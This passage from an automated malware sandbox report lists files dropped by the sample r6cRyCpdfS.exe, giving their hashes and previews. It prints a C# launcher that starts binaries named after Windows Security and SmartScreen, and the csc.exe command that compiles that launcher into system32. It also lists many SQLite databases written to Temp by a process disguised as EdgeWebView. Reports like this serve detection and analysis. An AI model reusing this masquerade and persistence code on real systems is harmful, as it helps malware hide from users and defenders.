                                                                                                                          SHA-512:6DBBB1784C45870FB8587DA09F9D2B694BA26F406DFF65C7CE7519B7DF6311E0C620D4F9F659B384D3993DBC0531A89DD40FDF966AEB57E09B93E37C69917B14
                                                                                                                          Malicious:false
                                                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\jdownloader\smartscreen.exe"); } catch { } }).Start();. }.}.

                                                                                                                          C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):250
                                                                                                                          Entropy (8bit):5.066673196375617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fpMV56V/H:Hu7L//TRq79cQWfBMVg/H
                                                                                                                          MD5:3AAB402E0ED405E6382A3617170C9B23
                                                                                                                          SHA1:86DD91051132E50F461589F570CF4DD87248BDFD
                                                                                                                          SHA-256:3543FF1862DF34754AD80D3578DAC142FA4066A30981F25950A91567C0283589
                                                                                                                          SHA-512:DAD3DBB68697033E9FC92BAF031D4560726CF749EF6C45AA528893C36F1F4AA7476FED3B47516F584DDA6032E6E67A53CAB0EFFF7406F28FAC8349EA9F43895E
                                                                                                                          Malicious:true
                                                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.0.cs"

                                                                                                                          C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.out

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):750
                                                                                                                          Entropy (8bit):5.248968253193488
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:KJN/I/u7L//TRq79cQWfBMVg/OKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfuVg/OKax5DqBVKVrj
                                                                                                                          MD5:A1C45DB934437AE3BC1EF9E6BF8D7CED
                                                                                                                          SHA1:BF67F8CD9B6B1CE8F6529D3E133CC7ED5692461E
                                                                                                                          SHA-256:071C7FF025A1C8AFDA86F2FCF862144A900724ED099C82DACB3D849BF5F11B4D
                                                                                                                          SHA-512:FB4533B00C2D21CFA995B5FD1671F73EA4BE078B86C25F6A82A9E70B0D634C1C25DA832166002552136CAA19A7D10F2E36B259333F234A42E1719DEC7507C9F2
                                                                                                                          Malicious:false
                                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                          C:\Users\user\AppData\Local\Temp\azo12vzT6I

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\b0RLC0pbFi

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\bIKD8JjpBx

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\bV6e1VKcex

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\bcy0wtRoBZ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\bn5KynkbKc

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\c2AaHLPNvR

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\cIiK4bB5tH

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\cU5aIwz6qF

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\cqbPK0IXWA

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\cxZOmF56JX

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\d4gqUaO5n9

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\dXxDzXcgcb

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\dYhCYEfIin

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\daXO1zdUNZ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):98304
                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\deWeUBlWXa

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\dsHgGsa0Yx

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\e7FG11P4oV

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\edpXg9IVkP

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
